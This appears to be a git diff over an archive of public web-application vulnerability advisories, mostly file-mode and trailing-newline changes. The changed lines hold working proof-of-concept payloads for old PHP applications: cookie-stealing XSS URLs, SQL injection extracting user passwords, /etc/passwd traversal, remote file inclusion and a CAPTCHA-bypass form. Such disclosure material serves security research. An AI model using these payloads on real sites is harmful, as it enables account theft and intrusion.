-http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS - \ No newline at end of file +http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30927.txt b/platforms/php/webapps/30927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30929.txt b/platforms/php/webapps/30929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3093.txt b/platforms/php/webapps/3093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30930.txt b/platforms/php/webapps/30930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30931.txt b/platforms/php/webapps/30931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30932.txt b/platforms/php/webapps/30932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30937.txt b/platforms/php/webapps/30937.txt old mode 100755 new mode 100644 index f51a84228..d03116941 --- a/platforms/php/webapps/30937.txt +++ b/platforms/php/webapps/30937.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Limbo CMS 1.0.4.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?com_option=>"'><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT> \ No newline at end of file +http://www.example.com/admin.php?com_option=>"'><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT> \ No newline at end of file diff --git a/platforms/php/webapps/30945.txt b/platforms/php/webapps/30945.txt old mode 100755 new mode 100644 index d02abb7e5..816dee3ce --- a/platforms/php/webapps/30945.txt +++ b/platforms/php/webapps/30945.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow All versions of FaqMasterFlexPlus are considered vulnerable. -http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] \ No newline at end of file +http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30946.txt b/platforms/php/webapps/30946.txt old mode 100755 new mode 100644 index f46230429..572c66f6e --- a/platforms/php/webapps/30946.txt +++ b/platforms/php/webapps/30946.txt @@ -73,6 +73,4 @@ Disclosure Timeline: Advisory discovered by: Yogesh Phadtare Secur-I Research Group - http://securview.com/ - - \ No newline at end of file + http://securview.com/ \ No newline at end of file diff --git a/platforms/php/webapps/30947.txt b/platforms/php/webapps/30947.txt old mode 100755 new mode 100644 index b617d873b..0fef19983 --- a/platforms/php/webapps/30947.txt +++ b/platforms/php/webapps/30947.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc All versions of FaqMasterFlexPlus are considered vulnerable. http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/* -http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin \ No newline at end of file +http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin \ No newline at end of file diff --git a/platforms/php/webapps/30948.txt b/platforms/php/webapps/30948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30949.txt b/platforms/php/webapps/30949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30950.html b/platforms/php/webapps/30950.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30951.html b/platforms/php/webapps/30951.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30952.html b/platforms/php/webapps/30952.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30953.txt b/platforms/php/webapps/30953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30954.txt b/platforms/php/webapps/30954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30955.txt b/platforms/php/webapps/30955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30957.txt b/platforms/php/webapps/30957.txt old mode 100755 new mode 100644 index 30690466b..77f5946b9 --- a/platforms/php/webapps/30957.txt +++ b/platforms/php/webapps/30957.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHCDownload 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[phcdownload/search.php?string=' \ No newline at end of file +http://www.example.com/[phcdownload/search.php?string=' \ No newline at end of file diff --git a/platforms/php/webapps/30958.txt b/platforms/php/webapps/30958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30959.txt b/platforms/php/webapps/30959.txt old mode 100755 new mode 100644 index 481d42adc..774f16699 --- a/platforms/php/webapps/30959.txt +++ b/platforms/php/webapps/30959.txt @@ -4,4 +4,4 @@ Makale Scripti is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://site.com/script_path/Ara/?ara= "><script>alert("g3");</script> \ No newline at end of file +http://site.com/script_path/Ara/?ara= "><script>alert("g3");</script> \ No newline at end of file diff --git a/platforms/php/webapps/3096.txt b/platforms/php/webapps/3096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30961.txt b/platforms/php/webapps/30961.txt old mode 100755 new mode 100644 index 75002d493..73a591279 --- a/platforms/php/webapps/30961.txt +++ b/platforms/php/webapps/30961.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects Kontakt Formular 1.4; other versions may be vulnerable as well. -http://www.example.com/[path]/includes/function.php?root_path=[Shellcode] \ No newline at end of file +http://www.example.com/[path]/includes/function.php?root_path=[Shellcode] \ No newline at end of file diff --git a/platforms/php/webapps/30962.txt b/platforms/php/webapps/30962.txt old mode 100755 new mode 100644 index dea2e67a6..f2105ba38 --- a/platforms/php/webapps/30962.txt +++ b/platforms/php/webapps/30962.txt @@ -4,4 +4,4 @@ MilliScripts is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/PATH/dir.php?do=browse&cat=[XSS] \ No newline at end of file +http://www.example.com/PATH/dir.php?do=browse&cat=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30964.txt b/platforms/php/webapps/30964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30965.txt b/platforms/php/webapps/30965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30966.txt b/platforms/php/webapps/30966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30967.txt b/platforms/php/webapps/30967.txt old mode 100755 new mode 100644 index 631ec651d..c396dff0b --- a/platforms/php/webapps/30967.txt +++ b/platforms/php/webapps/30967.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. -http://www.example.com/user/remindComplete?email=XSS \ No newline at end of file +http://www.example.com/user/remindComplete?email=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30968.txt b/platforms/php/webapps/30968.txt old mode 100755 new mode 100644 index ffe4a1864..517693f36 --- a/platforms/php/webapps/30968.txt +++ b/platforms/php/webapps/30968.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve arbitrary files from the MODx 0.9.6.1 is vulnerable; other versions may also be affected. -http://www.example.com/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc \ No newline at end of file +http://www.example.com/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc \ No newline at end of file diff --git a/platforms/php/webapps/30969.txt b/platforms/php/webapps/30969.txt old mode 100755 new mode 100644 index b0441b881..73c3f8ad2 --- a/platforms/php/webapps/30969.txt +++ b/platforms/php/webapps/30969.txt @@ -9,4 +9,4 @@ MODx 0.9.6.1 is vulnerable to this issue; other versions may also be affected. Method=POST Action=http://www.example.com/modx-0.9.6.1/index-ajax.php? Name=as_language Value=../ajaxSearch_readme.txt%00 -Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php \ No newline at end of file +Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php \ No newline at end of file diff --git a/platforms/php/webapps/3097.txt b/platforms/php/webapps/3097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30976.txt b/platforms/php/webapps/30976.txt old mode 100755 new mode 100644 index f947ccd5d..977732678 --- a/platforms/php/webapps/30976.txt +++ b/platforms/php/webapps/30976.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a MyPHP Forum 3.0 is vulnerable; other versions may also be affected. -submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*" \ No newline at end of file +submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*" \ No newline at end of file diff --git a/platforms/php/webapps/30977.txt b/platforms/php/webapps/30977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30978.txt b/platforms/php/webapps/30978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30979.txt b/platforms/php/webapps/30979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30980.txt b/platforms/php/webapps/30980.txt old mode 100755 new mode 100644 index e294c75d8..2a87584cd --- a/platforms/php/webapps/30980.txt +++ b/platforms/php/webapps/30980.txt @@ -10,4 +10,4 @@ http://www.example.com/templates/example_template.php?data[title]=%3C/title%3E%3 http://www.example.com/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30981.txt b/platforms/php/webapps/30981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30982.html b/platforms/php/webapps/30982.html old mode 100755 new mode 100644 index fed788a53..9cc2f4368 --- a/platforms/php/webapps/30982.html +++ b/platforms/php/webapps/30982.html @@ -6,4 +6,4 @@ Attackers can exploit this issue in conjunction with other weaknesses in the app Nucleus CMS 3.01 is vulnerable; other versions may also be affected. -<html> <head> <title>MoBiC-20 Bonus: another Nucleus CAPTCHA bypass exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/action.php" method="post"> <input type="hidden" name="action" value="addcomment" /> <input type="hidden" name="code" value="1" /> <input type="hidden" name="url" value="index.php?itemid=1" /> <input type="hidden" name="itemid" value="1" /> <input type="hidden" name="body" value="Captcha bypass test." /> <input type="hidden" name="myid" value="-1 union select 1,1,1 from nucleus_blog" /> <input type="hidden" name="remember" value="0" /> <input type="hidden" name="conf" value="1" /> </form> </body> </html> \ No newline at end of file +<html> <head> <title>MoBiC-20 Bonus: another Nucleus CAPTCHA bypass exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/action.php" method="post"> <input type="hidden" name="action" value="addcomment" /> <input type="hidden" name="code" value="1" /> <input type="hidden" name="url" value="index.php?itemid=1" /> <input type="hidden" name="itemid" value="1" /> <input type="hidden" name="body" value="Captcha bypass test." /> <input type="hidden" name="myid" value="-1 union select 1,1,1 from nucleus_blog" /> <input type="hidden" name="remember" value="0" /> <input type="hidden" name="conf" value="1" /> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/30983.txt b/platforms/php/webapps/30983.txt old mode 100755 new mode 100644 index ab9b94ee1..44f882ef1 --- a/platforms/php/webapps/30983.txt +++ b/platforms/php/webapps/30983.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br ExpressionEngine 1.2.1 is vulnerable to these issues; other versions may also be affected. -http://www.example.com/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30984.txt b/platforms/php/webapps/30984.txt old mode 100755 new mode 100644 index abe41c3ed..80280f27a --- a/platforms/php/webapps/30984.txt +++ b/platforms/php/webapps/30984.txt @@ -9,4 +9,4 @@ These issues affect eTicket 1.5.6-RC3, 1.5.6-RC2, 1.5.5.2; other versions may al The following proof-of-concept examples are available: For eTicket 1.5.6-RC3: Create a ticket with the subject <SCRIPT>a=/XSS/;alert(a.source)</SCRIPT> -For eTicket 1.5.6-RC2: Create a ticket with the subject <script>alert(123)</script> \ No newline at end of file +For eTicket 1.5.6-RC2: Create a ticket with the subject <script>alert(123)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30987.txt b/platforms/php/webapps/30987.txt old mode 100755 new mode 100644 index 656ef17c6..6a3366820 --- a/platforms/php/webapps/30987.txt +++ b/platforms/php/webapps/30987.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code on an affec This issue affects netRisk 1.9.7; other versions may also be affected. -http://www.example.com/Path/index.php?path=[SHELL] \ No newline at end of file +http://www.example.com/Path/index.php?path=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/30988.txt b/platforms/php/webapps/30988.txt old mode 100755 new mode 100644 index 7bf8ff4ca..2154a4f0c --- a/platforms/php/webapps/30988.txt +++ b/platforms/php/webapps/30988.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect Rotabanner Local 2 and 3; other versions may also be affected. -http://www.example.com/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30992.txt b/platforms/php/webapps/30992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30994.html b/platforms/php/webapps/30994.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30995.txt b/platforms/php/webapps/30995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30996.txt b/platforms/php/webapps/30996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30997.txt b/platforms/php/webapps/30997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3100.txt b/platforms/php/webapps/3100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31000.txt b/platforms/php/webapps/31000.txt old mode 100755 new mode 100644 index 77a0c9984..c1341f078 --- a/platforms/php/webapps/31000.txt +++ b/platforms/php/webapps/31000.txt @@ -4,4 +4,4 @@ SysHotel On Line System is prone to a local file-include vulnerability because i An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. -http://www.example.com/index.php?file==%2Fetc%2Fpasswd \ No newline at end of file +http://www.example.com/index.php?file==%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/php/webapps/31001.txt b/platforms/php/webapps/31001.txt old mode 100755 new mode 100644 index 4e1c8579d..125a2e8e6 --- a/platforms/php/webapps/31001.txt +++ b/platforms/php/webapps/31001.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects IceWarp Mail Server 9.1.1 for Windows; other versions may also be affected. -http://www.example.com:32000/admin/index.html?message=<script src="your-js.js"></script> \ No newline at end of file +http://www.example.com:32000/admin/index.html?message=<script src="your-js.js"></script> \ No newline at end of file diff --git a/platforms/php/webapps/31003.txt b/platforms/php/webapps/31003.txt old mode 100755 new mode 100644 index d5d635a03..fa663633a --- a/platforms/php/webapps/31003.txt +++ b/platforms/php/webapps/31003.txt @@ -10,4 +10,4 @@ Cookiename: OMEGALogon value:[MANDATOR]%7C[CUSTOMERNUMBER]%7C[USERID]%7C%7CArial%7CArial%7C%2D%2D%2D%2D%2D%2D%7C[SURNAME]%2C+[NAME]%7C%7C%7C[LASTLOGINTIME]%7C Cookiename: OMEGA[MANDATOR] -value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C \ No newline at end of file +value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C \ No newline at end of file diff --git a/platforms/php/webapps/31008.txt b/platforms/php/webapps/31008.txt old mode 100755 new mode 100644 index 357e13e5c..917f6bb78 --- a/platforms/php/webapps/31008.txt +++ b/platforms/php/webapps/31008.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The issues affect SMF 1.1.4; other versions of SMF and Joomla-SMF may also be vulnerable. http://www.example.com/component/option,com_smf/Itemid,8'XSS,1/topic,1.0/ -http://www.example.com/component/option,com_smf/Itemid,5/topic,1.XSS/ \ No newline at end of file +http://www.example.com/component/option,com_smf/Itemid,5/topic,1.XSS/ \ No newline at end of file diff --git a/platforms/php/webapps/31009.txt b/platforms/php/webapps/31009.txt old mode 100755 new mode 100644 index ad8756b29..e69810fc2 --- a/platforms/php/webapps/31009.txt +++ b/platforms/php/webapps/31009.txt @@ -5,4 +5,4 @@ ID-Commerce is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/liste.php?idFamille=1%20or%201=1# -http://www.example.com/liste.php?idFamille=1%20or%201=0# \ No newline at end of file +http://www.example.com/liste.php?idFamille=1%20or%201=0# \ No newline at end of file diff --git a/platforms/php/webapps/31011.txt b/platforms/php/webapps/31011.txt old mode 100755 new mode 100644 index e77c54167..4e94d6ad1 --- a/platforms/php/webapps/31011.txt +++ b/platforms/php/webapps/31011.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin This issue affects Members Area System 1.7; other versions are also likely affected. -http://www.example.com/view_func.php?i=http://www.example2.com/justsomedir/&l=testfile.txt? \ No newline at end of file +http://www.example.com/view_func.php?i=http://www.example2.com/justsomedir/&l=testfile.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31015.txt b/platforms/php/webapps/31015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31020.txt b/platforms/php/webapps/31020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31022.txt b/platforms/php/webapps/31022.txt old mode 100755 new mode 100644 index 9d9a17e13..eac102701 --- a/platforms/php/webapps/31022.txt +++ b/platforms/php/webapps/31022.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects versions prior to PHP Running Management 1.0.3. -http://www.example.com/index.php?message=%3Cscript%3Edocument.writeln(123)%3C/script%3E%20 \ No newline at end of file +http://www.example.com/index.php?message=%3Cscript%3Edocument.writeln(123)%3C/script%3E%20 \ No newline at end of file diff --git a/platforms/php/webapps/31027.txt b/platforms/php/webapps/31027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31028.txt b/platforms/php/webapps/31028.txt old mode 100755 new mode 100644 index 335f011e6..ab7fefbd2 --- a/platforms/php/webapps/31028.txt +++ b/platforms/php/webapps/31028.txt @@ -4,4 +4,4 @@ Article Dashboard is prone to multiple SQL-injection vulnerabilities because the A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/admin/login.php?user=admin'-- | /* \ No newline at end of file +http://www.example.com/admin/login.php?user=admin'-- | /* \ No newline at end of file diff --git a/platforms/php/webapps/3103.php b/platforms/php/webapps/3103.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31034.txt b/platforms/php/webapps/31034.txt old mode 100755 new mode 100644 index 0f14ae5d0..c6108a67d --- a/platforms/php/webapps/31034.txt +++ b/platforms/php/webapps/31034.txt @@ -8,4 +8,4 @@ Versions prior to MyBB 1.2.11 are vulnerable. http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2 http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+ -http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe \ No newline at end of file +http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe \ No newline at end of file diff --git a/platforms/php/webapps/31035.txt b/platforms/php/webapps/31035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31037.txt b/platforms/php/webapps/31037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31038.txt b/platforms/php/webapps/31038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3104.txt b/platforms/php/webapps/3104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31041.txt b/platforms/php/webapps/31041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31044.txt b/platforms/php/webapps/31044.txt old mode 100755 new mode 100644 index 680df21ed..944751583 --- a/platforms/php/webapps/31044.txt +++ b/platforms/php/webapps/31044.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default. -http://www.example.com/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/31045.txt b/platforms/php/webapps/31045.txt old mode 100755 new mode 100644 index c42fb471a..70ea49a2e --- a/platforms/php/webapps/31045.txt +++ b/platforms/php/webapps/31045.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable. -http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com \ No newline at end of file +http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/31048.txt b/platforms/php/webapps/31048.txt old mode 100755 new mode 100644 index abc3ef0d6..0fcb4ce4c --- a/platforms/php/webapps/31048.txt +++ b/platforms/php/webapps/31048.txt @@ -8,4 +8,4 @@ These issues affect versions prior to PacerCMS 0.6.1. NOTE: To exploit these issues, the attacker may require 'staff member' access. -http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL] \ No newline at end of file +http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31049.txt b/platforms/php/webapps/31049.txt old mode 100755 new mode 100644 index 3e270ac2c..a9a913478 --- a/platforms/php/webapps/31049.txt +++ b/platforms/php/webapps/31049.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects DeluxeBB 1.1; other versions may also be vulnerable. -http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script> \ No newline at end of file +http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/php/webapps/3106.txt b/platforms/php/webapps/3106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31061.txt b/platforms/php/webapps/31061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31062.txt b/platforms/php/webapps/31062.txt old mode 100755 new mode 100644 index 63cd797f2..53de1ada8 --- a/platforms/php/webapps/31062.txt +++ b/platforms/php/webapps/31062.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable. -http://www.example.com/maint/index.php?"><script>alert('xss')</script> \ No newline at end of file +http://www.example.com/maint/index.php?"><script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/31063.txt b/platforms/php/webapps/31063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31064.txt b/platforms/php/webapps/31064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31065.txt b/platforms/php/webapps/31065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31066.txt b/platforms/php/webapps/31066.txt old mode 100755 new mode 100644 index 646122ba8..ff276c487 --- a/platforms/php/webapps/31066.txt +++ b/platforms/php/webapps/31066.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected. -http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script> \ No newline at end of file +http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/31067.txt b/platforms/php/webapps/31067.txt old mode 100755 new mode 100644 index 786d917b8..5e516cc3c --- a/platforms/php/webapps/31067.txt +++ b/platforms/php/webapps/31067.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 \ No newline at end of file +http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31068.txt b/platforms/php/webapps/31068.txt old mode 100755 new mode 100644 index 1227facd9..799254a7d --- a/platforms/php/webapps/31068.txt +++ b/platforms/php/webapps/31068.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to upload and execute arbitrary sc MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected. -http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder= \ No newline at end of file +http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder= \ No newline at end of file diff --git a/platforms/php/webapps/31069.txt b/platforms/php/webapps/31069.txt old mode 100755 new mode 100644 index e4c5edd40..6833dbc3f --- a/platforms/php/webapps/31069.txt +++ b/platforms/php/webapps/31069.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected. -http://www.example.com/index.php/"><script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/index.php/"><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/31074.txt b/platforms/php/webapps/31074.txt old mode 100755 new mode 100644 index a0db41d6a..5e32b1975 --- a/platforms/php/webapps/31074.txt +++ b/platforms/php/webapps/31074.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects Nucleus CMS 3.31; other versions may also be vulnerable. -http://www.example.com/[installdir]/action.php/"><script>alert('DSecRG XSS')</script> \ No newline at end of file +http://www.example.com/[installdir]/action.php/"><script>alert('DSecRG XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/31075.txt b/platforms/php/webapps/31075.txt old mode 100755 new mode 100644 index 0df2d14f8..1707c5134 --- a/platforms/php/webapps/31075.txt +++ b/platforms/php/webapps/31075.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AmpJuke 0.7.0 is vulnerable; other versions may also be affected. -http://www.example.com/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss] \ No newline at end of file +http://www.example.com/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/31077.txt b/platforms/php/webapps/31077.txt old mode 100755 new mode 100644 index 6bf75bffc..605c7878f --- a/platforms/php/webapps/31077.txt +++ b/platforms/php/webapps/31077.txt @@ -4,4 +4,4 @@ The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vul Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 